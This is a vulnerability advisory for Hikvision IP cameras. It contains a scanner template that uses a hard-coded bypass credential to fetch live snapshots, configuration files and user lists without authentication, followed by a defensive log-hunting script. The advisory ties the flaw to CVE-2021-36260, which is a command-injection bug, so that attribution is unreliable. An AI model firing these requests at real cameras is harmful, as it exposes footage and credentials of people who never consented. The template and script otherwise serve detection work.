Hikvision IP Camera - Snapshot, Config, and User Info Exposure
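Vulnerability Information
Vulnerability name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
Vulnerability ID:
CVE: CVE-2021-36260
Vulnerability type: Information disclosure
Severity: High
Description: Hikvision IP Camera is a network camera device widely deployed in enterprise and home surveillance systems for real-time video monitoring and security protection. Because these devices are so widely used, their security is critical. This vulnerability involves sensitive endpoints that can be accessed without authentication, including live snapshots, encrypted configuration files, and an XML file containing user credentials. The root cause of this information disclosure is insufficient access control on specific endpoints, which lets an attacker obtain sensitive information without authenticating. Through an exploit chain based on CVE-2021-36260 and related bypass logic, an attacker can remotely access this sensitive data, which may lead to credential disclosure, privacy violations, and further security threats. Because it can be exploited without authentication, the vulnerability is rated high severity and may seriously affect users of affected devices.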
info:
  name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
  author: AbdulrahmanTamim
  severity: high
  description: >
    Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.
    This includes live snapshot feeds, encrypted configuration files, and full user credential XML.
    Based on exploit chaining of CVE-2021-36260 and related bypass logic.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2021-36260
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
  tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml

variables:
  b64auth: YWRtaW46MTEK

requests:
  - method: GET
    path:
      - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - type: word
        part: header
        words:
          - "Content-Type: image/jpeg"
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: snapshot-endpoint
        part: request
        regex:
          - "/onvif-http/snapshot\\?auth=.*"

  - method: GET
    path:
      - "{{BaseURL}}/System/configurationFile?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - type: word
        part: header
        words:
          - "Content-Type: application/octet-stream"
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: config-download
        part: request
        regex:
          - "/System/configurationFile\\?auth=.*"

  - method: GET
    path:
      - "{{BaseURL}}/Security/users?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - type: word
        words:
          - "<userName>"
          - "<userLevel>"
        condition: and
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: exposed-usernames
        regex:
          - "<userName>(.*?)</userName>"
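
For defenders, the same three endpoints can be hunted for in web access logs. The following is an added example, not part of the original template or of any Hikvision or nuclei code: it assumes a reverse proxy or gateway in front of the cameras that writes Combined Log Format, and the function name, sample log lines, IP addresses and `PLACEHOLDER` auth value are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths taken from the template above. Lower-cased for comparison; treating
# the device's paths as case-insensitive is an assumption made for safety.
SENSITIVE_PATHS = {
    "/onvif-http/snapshot": "snapshot",
    "/system/configurationfile": "config-download",
    "/security/users": "user-list",
}

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_unauth_access(lines):
    """Return one finding per request that hits a sensitive path with an
    auth= query parameter; 'served' is True when the response was 200."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        url = urlsplit(m["target"])
        kind = SENSITIVE_PATHS.get(url.path.rstrip("/").lower())
        query = parse_qs(url.query, keep_blank_values=True)
        if kind is None or "auth" not in query:
            continue
        findings.append({
            "ip": m["ip"], "time": m["ts"], "endpoint": kind,
            "served": m["status"] == "200",  # True: data left the device
        })
    return findings

# Constructed sample lines (documentation IP ranges, placeholder auth value).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /onvif-http/snapshot?auth=PLACEHOLDER HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:01:03 +0000] "GET /Security/users?auth=PLACEHOLDER HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Mar/2024:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:01:04 +0000] "GET /System/configurationFile?auth=PLACEHOLDER HTTP/1.1" 200 90112 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_unauth_access(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to True means the device answered the request with data, so the camera's configuration and accounts should be treated as exposed; a finding with `served` False still records a probe worth correlating by source IP.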